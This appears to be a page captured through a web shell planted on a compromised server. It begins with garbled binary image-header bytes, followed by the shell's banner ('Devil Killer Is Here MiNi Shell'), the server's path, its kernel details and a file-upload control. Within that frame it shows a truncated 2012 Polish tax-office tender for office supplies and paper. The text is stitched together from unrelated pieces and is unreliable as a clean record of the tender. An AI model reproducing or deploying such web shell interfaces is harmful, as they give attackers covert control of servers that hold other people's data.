JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120912/344436-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Sukcesywna dostawa nowych materiałów biurowych oraz papieru kserograficznego 
i papieru komputerowego dla Urzędu Skarbowego w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 344436 - 2012; data zamieszczenia: 12.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Jagiellończyka 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7115742, faks 095 7228997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.usgorzow.mf.gov.pl   nowy nr faxu 95 7115905</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa nowych materiałów biurowych oraz papieru kserograficznego 
i papieru komputerowego dla Urzędu Skarbowego w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 2 części, oznaczone literami A, B 
w następujący sposób:

1. Część A - SUKCESYWNA DOSTAWA NOWYCH MATERIAŁÓW BIUROWYCH 
Przedmiot zamówienia obejmuje dostawę nowych materiałów biurowych.  
1	Koperta C6 z okienkiem w prawym dolnym rogu, biała, samoklejąca (opakowanie 1000 szt.); CPV 30199230-1 Koperty; op. 80;
2	Koperta C6 zwykła, biała, samoklejąca  o wymiarach 114 x 162 mm (opakowanie 1000 szt.); CPV 30199230-1 Koperty; op. 130;
3	Koperta rozszerzana - B4 brązowa; samoklejąca, o wymiarach 250 x 354 x 40mm; CPV	30199230-1 Koperty; szt.	1000;
4	Koperta szara, samoklejąca średnia C5 o wymiarach 162 x 229 mm; CPV	30199230-1 Koperty; szt.	4000;
5	Koperta szara, samoklejąca, duża B4; CPV	30199230-1 Koperty; szt.	3000
6	Koperta z okienkiem w prawym dolnym rogu - DL, biała, samoklejąca o wymiarach 110 x 220 mm;	CPV 30199230-1 Koperty;	szt.	110000
7	Koperta E4 RBD rozszerzana o wymiarach: 280 x 400 x 40 mm; CPV	30199230-1 Koperty;	szt.	20;
8	Koperty z bąbelkami 175 mm x 120 mm; CPV	30199230-1 Koperty; szt.	10;
9	Skoroszyt plastikowy przeźroczysty z europerforacją do wpięcia do segregatora, format A4 wykonany z PCV. Zaopatrzony w wymienny pasek papieru do opisu, posiadający nie łamiące się wąsy; CPV	22851000-0 Skoroszyty;	szt.	400;
10	Skoroszyt plastikowy, format A4, wykonany z PCV. Przednia okładka przeźroczysta. Zaopatrzony w wymienny pasek papieru do opisu, posiadający nie łamiące się wąsy; CPV	22851000-0 Skoroszyty;	szt.	400;
11	Skoroszyt tekturowy z oczkami umożliwiającymi wpięcie do segregatora, posiadający nie łamiące się wąsy; CPV 	22851000-0 Skoroszyty;	szt.	1500;
12	Skoroszyt zwykły tekturowy, posiadający nie łamiące się wąsy; CPV	22851000-0 Skoroszyty;	szt.	2500;
13	Teczka A4 plastikowa - wiązana, przednia okładka przeźroczystA; CPV	30192000-1 Wyroby biurowe; szt.	300;
14	Teczka A4 wiązana - kolor biały. Posiada trzy zakładki chroniące dokumenty przed wypadaniem.; CPV 	30192000-1 Wyroby biurowe;	szt.	12000;
15	Teczka do podpisu (15 - 17 przegródek); CPV	30192000-1
Wyroby biurowe;	szt.	50;
16	Koszulka L-ka winna być sztywna, formatu A4, bez możliwości wpięcia do segregatora.;CPV	30192500-6 Okładki przeźroczyste;	szt.	1500;
17	Obwoluta - koszulka o fakturze groszkowej (opak. 100 szt.); koszulka na dokumenty formatu A4, otwierana z góry, wyposażona w grzbiet umożliwiający wpięcie do segregatora; CPV 	30192500-6 Okładki przeźroczyste;	op.	200;
18	Spinacz biurowy duży zwykły 50 mm (opak. 100 szt.) wykonany z wysokiej jakości drutu sprężynującego niklowanego; CPV	30197220-4
Spinacze do papieru;	op.	100;
19	Spinacz biurowy mały 28 mm (opak. 100 szt.) wykonany z wysokiej jakości drutu sprężynującego niklowanego; CPV	30197220-4 Spinacze do papieru;	op.	200;
20	Klipsy do papieru min. 32 mm; CPV	30197220-4 Spinacze do papieru;	szt.	20;
21	Zszywacz do zszywania 100 kart; CPV 	30197320-5
Zszywacze;	szt.	30;
22	Zszywacz zwykły biurowy na zszywki o wymiarze 24/6. Wykonany z metalu; CPV	30197320-5 Zszywacze;	szt.	80;
23	Zszywki 23/10 (opakowanie 1000 szt.);CPV	30197100-7
Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie; 	op.	20;
24	Zszywki stalowe cynkowe 24/6 (opak. 1000 szt.)	30197100-7 ; CPV Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie;	op.	800;
25	Dziurkacz mały, ma dziurkować minimalnie 1 kartkę 80 g, a maksymalnie 20 kartek 80 g; CPV 	30197330-8 Dziurkacze;	szt.	29;
26	Dziurkacz żeliwny, ma dziurkować minimalnie 1 kartkę 80 g, a maksymalnie 40 kartek 80 g ; CPV  	30197330-8 Dziurkacze;	szt.	12;
27	Dziurkacz duży, ma dziurkować minimalnie 1 kartkę 80 g, a maksymalnie 100 kartek 80 g z długą ruchomą rączką ; CPV	30197330-8 Dziurkacze;	szt.	3;
28	Cienkopis, tusz kolor: czarny,czerwony,zielony,niebieski, linia pisania nie grubsza niż 0,4mm, długość linii pisania nie krótsza niż 1500 m; CPV	39292400-9 Przybory do pisania;	szt.	600;
29	Długopis żelowy, gr. linii 0,7 mm; CPV	39292400-9
Przybory do pisania;	szt.	10;
30	Długopis automatyczny typu ZENITH lub równoważny o średnicy do 10 mm z metalową końcówką; CPV	39292400-9 Przybory do pisania;	szt.	243;
31	Wkłady do długopisu automatycznego typu ZENITH lub równoważnego wymienionego w poz. 30; CPV	39292400-9
Przybory do pisania;	szt.	600;
32	Długopis na pulpit - możliwość mocowania w pozycji pionowej i poziomej, długość  sprężynki po rozciągnięciu 1,0-1,5 m ; CPV	39292400-9
Przybory do pisania;	szt.	100;
33	Długopis zwykły (niebieski/ czarny/ zielony/ czerwony) z wymiennym wkładem i metalową końcówką - gr. linii 0,5 - 0,7 mm; CPV	39292400-9
Przybory do pisania;	szt.	400;
34	Wkłady z metalową końcówką (niebieski/ czarny/ zielony/ czerwony) gr. linii 0,5 - 0,7 mm do długopisu zwykłego wymienionego w poz. 33; CPV	39292400-9 Przybory do pisania;	szt.	400;
35	Ołówek biurowy drewniany HB; CPV 30192130-1 Ołówki; szt.	150;
36	Pisak (czarny /niebieski /zielony/ czerwony); CPV	30192125-3
Pisaki;	szt.	400;
37	Pisak wodoodporny	; CPV30192125-3 Pisaki;	szt.	150;
38	Pisak przeznaczony do pisania po płytach CD i DVD; CPV	30192125-3
Pisaki;	szt.	4;
39	Marker olejowy, biały, z tuszem szybkoschnącym dozowanym przez zaworek, długość linii pisania min. 2400  m, cienka okrągła końcówka; CPV 	30192125-3 Pisaki;	szt.	4; 
40	Zakreślacz tekstu o długotrwałym działaniu, dużej odporności na wysychanie, tusz na bazie wody, miękka płynna linia o szerokości nie mniej niż  5 mm, ścięta końcówka pisząca, natychmiastowa trwała fluorescencyjność; CPV	30192125-3 Pisaki; szt.	600;
41	Markery grube (czerwone, czarne) z okrągłą końcówką do pisania na tablicach białych; CPV	30237430-2 Markery;	szt.	10;
42	Zeszyt akademicki format A4, (96 kart.) miękka oprawa; CPV	30192000-1 Wyroby biurowe;	szt.	40;
43	Zeszyt akademicki format A4, (96 kart.) twarda oprawa; CPV	30192000-1 Wyroby biurowe;	szt.	40;
44	Zeszyt format  A5 (60 kart.) białe kartki w kratkę; CPV	30192000-1 Wyroby biurowe;	szt.	100;
45	Zeszyt format A5 (32 kart.) białe kartki w kratkę; CPV	30192000-1 Wyroby biurowe;	szt.	50;
46	Blok techniczny, kartki koloru białego, format A4, 10 kartek; CPV	22816000-3 Bloki papierowe ; szt.	40;
47	Blok z makulatury A4/ 50 kartek; CPV	22816000-3 Bloki papierowe; 	szt.	200;
48	Blok z makulatury A5/ 50 kartek; CPV	22816000-3 Bloki papierowe ; szt.	70;
49	Linijka  z tworzywa sztucznego - długość 20 cm ; CPV 39292500-0 Linijki;	szt.	40;
50	Linijka  z tworzywa sztucznego - długość 30 cm	; CPV 39292500-0 Linijki;	szt.	40;
51	Nożyczki biurowe 25 cm z ostrzem z nierdzewnej stali. Ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego; CPV	39241200-5
Nożyczki;	 szt. 	60;
52	Nożyczki biurowe od 15 cm - 17 cm, z ostrzem z nierdzewnej stali. Ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego;	39241200-5 Nożyczki;	szt.	20;
53	Korektor w płynie (w długopisie - metalowa końcówka) szybkoschnący, pojemność nie mniej niż 8 ml;	30192160-0 Korektory;	szt.	100;
54	Korektor w płynie (z pędzelkiem) szybkoschnący, pojemność nie mniej niż 20 ml; CPV	30192160-0 Korektory;	szt.	70;
55	Kostka papierowa na biurko 83 mm x 83 mm (500 arkuszy w kostce) koloru białego ; CPV	22816100-4 Bloczki notatkowe; szt.	500;
56	Kostka papierowa samoprzylepna 75 mm x 75 mm (100 arkuszy w kostce); CPV 	22816300-6 Bloczki samoprzylepnych karteczek na notatki;
	szt.	600;
57	Segregator szeroki A4. Szerokość grzbietu 70 mm posiadający mechanizm dźwigniowy z dociskaczem; CPV	30199500-5 Segregatory, pudełka na listy, pudełka do przechowywania i podobne wyroby;	szt.	2000;
58	Segregator wąski A4. Szerokość grzbietu 50 mm posiadający mechanizm dźwigniowy z dociskaczem; 30199500-5 Segregatory, pudełka na listy, pudełka do przechowywania i podobne wyroby;	szt.	500;
59	Naklejka na segregator samoprzylepna o szerokości 40-50 mm;	CPV 22459100-3 Nalepki i taśmy reklamowe;	szt.	1500.
60	Naklejka na segregator samoprzylepna o szerokości 60-70 mm; CPV	22459100-3 Nalepki i taśmy reklamowe;	szt.	1500;
61	Etykiety białe, papierowe, samoprzylepne do drukarki kodów kreskowych ZEBRA TLP 2844 o wymiarach 50 mm x 30 mm (opakowanie-rolka po 1000 szt.); CPV 	30199760-5 Etykiety;	op.	34;
62	Etykiety białe, papierowe, samoprzylepne do drukarki kodów kreskowych ZEBRA TLP 2844 o wymiarach 75mm x 25 mm (opakowanie-rolka po 1000 szt.); CPV 	30199760-5 Etykiety;	op.	217;
63	Fastykuły bez tasiemek; CPV	30192000-1 Wyroby biurowe; 	szt.	4000;
64	Tasiemka archiwizacyjna 50 mb - (tasiemka podobna do taśm zamontowanych w teczkach wiązanych); CPV	30192000-1
Wyroby biurowe;	szt.	170;
65	Gumka o rozmiarze min. 63,5x24x9mm do usuwania zapisów naniesionych ołówkiem lub długopisem nie niszcząca papieru podczas ścierania umożliwiająca delikatne i czyste wymazywanie.; CPV 	30192100-2 Gumki	; szt.	150;
66	Klej w płynie zawierający końcówkę z gąbką, nie marszczący papieru. Pojemność nie mniej niż 40ml	; CPV 24910000-6 Kleje;	szt.	600;
67	Gumki recepturki -  duże (opak. 1 kg) średnica 60 mm, długość 10 cm; CPV	30192000-1 Wyroby biurowe; 	op.	20;
68	Kalka maszynowa, format A4, wykonana z materiału gwarantującego wielokrotne wykorzystanie arkuszy o  gramaturze warstwy kopiującej 10 g/m2 (opakowanie 25 arkuszy);	30199110-4
Kalka maszynowa;	op.	7;
69	Pineski (opakowanie 50 szt.); CPV	30197100-7
Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie; 	op.	50;
70	Plastelina (opak. 10 szt.); CPV	30192000-1
Wyroby biurowe;	op.	35;
71	Rozszywasz pozwalający na łatwe usuwanie zszywek z dokumentów. Wykonany z metalu z plastikowymi uchwytami; 30197321-2 Usuwacz zszywek; 	szt.	60;
72	Rysiki do ołówka automatycznego typu Pentel lub równoważnego (opakowanie-fiolka min. 10 rysików) ; CPV	37822000-6 Rysiki; op.	90;
73	Taśma do maszyn liczących (57 mm 25 mb) biała; CPV	30145100-8
Rolki do kalkulatorów; 	szt.	260;
74	Taśma klejąca samoprzylepna (przeźroczysta szerokość 18 mm długość 20m).; CPV	44424200-0 Taśma przylepna;	szt.	350;
75	Taśma pakowa, szara z klejem akrylowym o szerokości 48 mm i dł. nie mniejszej niż 50 m.; CPV 44424200-0 Taśma przylepna;	szt.	60
76	Temperówka wykonana z plastiku, posiada stalowe ostrze mocowane wkrętem; CPV	30192133-2 Temperówki do ołówków; 	szt.	120; 
77	Tusz do stempli metalowych w plastikowej butelce (czarny) o pojemności nie mniejszej niż 25 ml; CPV	22600000-6 Tusz; szt.	30;
78	Tusz do stempli w plastikowej butelce (czarny), uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml.; CPV	22600000-6 Tusz;	szt.	50;
79	Tusz do stempli w plastikowej butelce (czerwony) uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml.; CPV	22600000-6 Tusz;	szt.	240;
80	Wąsy do akt, niełamiące się; CPV	30192000-1 Wyroby biurowe; 	szt.	1100;
81	Zwilżacz biurowy do palców, glicerynowy, bezbarwny, bezzapachowy; CPV	30192000-1 Wyroby biurowe; 	szt. 	100;
82	Płyty CD-R o pojemności min. 700 MB; CPV	30234300-1
Płyty kompaktowe (CD);	szt. 	300;
83	Płyty DVD-R o pojemności min. 4,7 GB; CPV	30234400-2
Uniwersalne dyski wideo (DVD); 	szt. 	440;
84	Taśmy DAT do archiwizacji danych, typ DDS-4, pojemność min. 40 GB; CPV	30192000-1 Wyroby biurowe;	szt. 	120;
85	Grzbiet - wsuwka, format A-4 w formie plastikowej rynienki, w którą można wsunąć (oprawić) plik kartek, zaokrąglone końcówki ułatwiające wkładanie dokumentów (do oprawy max 30 kartek); CPV	30192000-1 Wyroby biurowe; 	szt.	50;
86	Grzbiet - wsuwka, format A-4 w formie plastikowej rynienki, w którą można wsunąć (oprawić) plik kartek, zaokrąglone końcówki ułatwiające wkładanie dokumentów (do oprawy max 60 kartek); CPV	30192000-1
Wyroby biurowe;	szt.	60;
87	Grzbiet do bindowania - standardowy plastikowy, format A4, (do oprawy max 30 kartek); CPV	30192000-1 Wyroby biurowe;	szt.	50;
88	Grzbiet do bindowania - standardowy plastikowy, format A4, (do oprawy max 65 kartek); CPV	30192000-1 Wyroby biurowe	; szt.	60;
89	Okładka do bindowania bezbarwna, z PCV gr  0,2 mm; CPV	30192500-6 Okładki przeźroczyste;	szt.	200;
90	Okładka do bindowania kartonowa o fakturze skóropodobnej, 
min. 250 g/m2; CPV	30192000-1 Wyroby biurowe	; szt.	200;
91	Okładka do dyplomu format A4; CPV	22852100-8
Okładki na akta; 	szt.	10;
92	Okładka do laminowania, przeźroczysta, format A4 
(opakowanie 100 szt.); CPV	30192500-6 Okładki przeźroczyste;	op.	1;
93	Okładka samoprzylepna, przeźroczysta, bezbarwna o wymiarach
  33 cm x 150 cm; CPV	30192500-6 Okładki przeźroczyste;	szt.	10;
94	Kartki ozdobne na list gratulacyjny; CPV	30199000-0
Papeteria i inne wyroby;	szt.	50;
95	Karton tekturowy, zamykany, do składania, mogący pomieścić 5 szt. szerokich pełnych segregatorów formatu A4; CPV 44617100-9 Pudła kartonowe;	szt.	130;
96	Papier pakowy szary (arkusz) o wymiarach min. 105 cm x 126 cm;	CPV 30192000-1 Wyroby biurowe;	szt.	150;

2. Część B - SUKCESYWNA DOSTAWA NOWEGO PAPIERU KSEROGRAFICZNEGO                     	I PAPIERU KOMPUTEROWEGO
 Przedmiot zamówienia obejmuje  dostawę nowego papieru kserograficznego i papieru komputerowego:
1	Papier komputerowy 250/1 biały, 2000 składek (karton); CPV	30199330-2 Papier ciągły do drukarek komputerowych;	karton	10;
2	Papier komputerowy 250/2 biały, 900 składek(karton); CPV	30199330-2 Papier ciągły do drukarek komputerowych;	karton	40;
3	Papier komputerowy 250 x 12, mix 3-kolorowy, 600 składek (karton); CPV	30199330-2 Papier ciągły do drukarek komputerowych;	karton	8;
4	Papier komputerowy 390/1 biały, 2000 składek (karton); CPV	30199330-2 Papier ciągły do drukarek komputerowych;	karton	100;
5	Papier kserograficzny A4 500 kartek w ryzie (dostarczany 
w oryginalnym opakowaniu producenta), klasa C, gramatura 80g/m2 (+/-2), białość CIE 146 (+/-3), nieprzezroczystość większa lub równa 91%, bezpyłowy; CPV	30197644-2 Papier kserograficzny;	ryza	4400;
6	Papier kserograficzny A3  500 kartek w ryzie (dostarczany
w oryginalnym opakowaniu producenta), klasa C, gramatura 80g/m2 (+/-2), białość CIE 146 (+/-3), nieprzezroczystość większa lub równa 91%, bezpyłowy; CPV	30197644-2 Papier kserograficzny; ryza	120;
7	Papier kolorowy, mix 5 kolorów, A4 100 kartek w ryzie (pakowane po 5 kolorów x 20 arkuszy), dostarczany w oryginalnym opakowaniu producenta, gramatura 80g/m2 (+/-2), nieprzezroczystość większa lub równa 91%; CPV	30197644-2 Papier kserograficzny;	opakowanie	5;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1, 22.85.10.00-0, 30.19.20.00-1, 30.19.25.00-6, 30.19.72.20-4, 30.19.73.20-5, 30.19.71.00-7, 30.19.73.30-8, 39.29.24.00-9, 30.19.21.30-1, 30.19.21.25-3, 30.23.74.30-2, 22.81.60.00-3, 39.29.25.00-0, 39.24.12.00-5, 30.19.21.60-0, 22.81.61.00-4, 22.81.63.00-6, 30.19.95.00-5, 22.45.91.00-3, 30.19.97.60-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
